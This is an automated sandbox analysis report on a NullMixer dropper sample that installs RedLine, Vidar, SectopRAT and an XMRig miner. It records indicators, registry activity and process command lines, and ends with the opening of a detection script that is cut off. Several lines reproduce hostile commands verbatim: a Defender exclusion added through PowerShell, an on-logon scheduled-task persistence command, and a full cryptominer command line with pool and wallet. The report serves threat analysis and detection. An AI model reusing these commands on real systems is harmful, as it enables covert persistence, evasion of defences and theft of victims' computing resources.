Analysis Overview
SHA256
cfdcbcca4f75f287d6389cda895571530ddb9a2bbdf54cce52c1c65e969ac0a3
Threat Level: Known bad
The file cceff411feab78a02a22744e2eae9ab8_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
SectopRAT
PrivateLoader
Vidar family
RedLine payload
Sectoprat family
xmrig
Xmrig family
Nullmixer family
Redline family
Privateloader family
SectopRAT payload
RedLine
Vidar
NullMixer
XMRig Miner payload
Vidar Stealer
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Loads dropped DLL
ASPack v2.12-2.42
Checks computer location settings
Reads user/profile data of web browsers
Looks up external IP address via web service
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Drops file in Windows directory
Browser Information Discovery
Enumerates physical storage devices
Program crash
Unsigned PE
System Location Discovery: System Language Discovery
Enumerates system info in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies system certificate store
Suspicious use of WriteProcessMemory
Checks SCSI registry key(s)
Uses Task Scheduler COM API
Suspicious use of SendNotifyMessage
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Modifies Internet Explorer settings
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-12-06 12:12
Signatures
Unsigned PE
Analysis: behavioral4
Detonation Overview
Submitted
2024-12-06 12:12
Reported
2024-12-06 12:15
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
Redline family
SectopRAT
SectopRAT payload
Sectoprat family
Vidar
Vidar family
Xmrig family
xmrig
Vidar Stealer
XMRig Miner payload
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\chrome2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\c0f099be1ace2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\e4f0738cc5646a38.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1000 set thread context of 4760 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe |
| PID 4604 set thread context of 5580 | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | C:\Windows\explorer.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\c0f099be1ace2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\3d1f9c2a6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\621c13b77.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\winnetdriv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\3d1f9c2a6.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\3d1f9c2a6.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\3d1f9c2a6.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\caa4baaf544.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\6f1aa71747b4a291.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\chrome2.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
| Image | Command line |
| C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe" |
| C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe | "C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe" |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6f1aa71747b4a291.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c c0f099be1ace2.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c caa4baaf544.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 24ebc9ce784c63.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c d55cc0d45c3a05.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 621c13b77.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 3d1f9c2a6.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c e4f0738cc5646a38.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 09b9624c6ac9.exe |
| C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\e4f0738cc5646a38.exe | e4f0738cc5646a38.exe |
| C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\caa4baaf544.exe | caa4baaf544.exe |
| C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\c0f099be1ace2.exe | c0f099be1ace2.exe |
| C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\3d1f9c2a6.exe | 3d1f9c2a6.exe |
| C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\6f1aa71747b4a291.exe | 6f1aa71747b4a291.exe |
| C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe |
| C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\24ebc9ce784c63.exe | 24ebc9ce784c63.exe |
| C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\621c13b77.exe | 621c13b77.exe |
| C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe | d55cc0d45c3a05.exe |
| C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe | 09b9624c6ac9.exe |
| C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3016 -ip 3016 |
| C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 556 |
| C:\Users\Admin\AppData\Local\Temp\chrome2.exe | "C:\Users\Admin\AppData\Local\Temp\chrome2.exe" |
| C:\Users\Admin\AppData\Local\Temp\setup.exe | "C:\Users\Admin\AppData\Local\Temp\setup.exe" |
| C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe | "C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe" -a |
| C:\Windows\winnetdriv.exe | "C:\Users\Admin\AppData\Local\Temp\setup.exe" 1733487159 0 |
| C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3312 -ip 3312 |
| C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 3312 -s 356 |
| C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2380 -ip 2380 |
| C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2380 -s 1072 |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit |
| C:\Windows\system32\schtasks.exe | schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' |
| C:\Users\Admin\AppData\Roaming\services64.exe | "C:\Users\Admin\AppData\Roaming\services64.exe" |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe" |
| C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe" |
| C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS76B2.tmp\Install.cmd" " |
| C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/16B4c7 |
| C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb24c746f8,0x7ffb24c74708,0x7ffb24c74718 |
| C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2 |
| C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3 |
| C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2796 /prefetch:8 |
| C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1 |
| C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1 |
| C:\Windows\System32\CompPkgSrv.exe | C:\Windows\System32\CompPkgSrv.exe -Embedding |
| C:\Windows\System32\CompPkgSrv.exe | C:\Windows\System32\CompPkgSrv.exe -Embedding |
| C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5240 /prefetch:8 |
| C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5240 /prefetch:8 |
| C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1 |
| C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5344 /prefetch:1 |
| C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1 |
| C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1 |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit |
| C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe | "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe" |
| C:\Windows\system32\schtasks.exe | schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' |
| C:\Windows\explorer.exe | C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.main/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BJ+edII5Fll530cZ/+msGEWovb73nU3RrOnuNmRoFcg" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth |
| C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1 |
| C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1 |
| C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2500 /prefetch:1 |
| C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:1 |
| C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:1 |
| C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1 |
| C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2408 /prefetch:1 |
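Three command lines in this list carry the whole story: the PowerShell call that adds a Defender exclusion for 1cr.exe, the schtasks call that registers services64.exe to run at every logon with highest privileges from the user's Roaming profile, and the explorer.exe instance whose arguments are a complete xmrig configuration (pool, wallet, TLS, stealth flags); the SetThreadContext row above shows services64.exe (PID 4604) targeting that explorer.exe (PID 5580). The script below is an added example, not part of the sandbox report, that flags those three patterns in process-creation records. Its event records are constructed from the process list (the miner command line is abbreviated), the two benign records at the end are invented controls, and the field names, thresholds and rule names are this example's own assumptions rather than any vendor schema.

```python
"""Command-line triage for three behaviours in the process list: a Defender exclusion added
through PowerShell, an on-logon scheduled task whose action lives in a user-writable directory,
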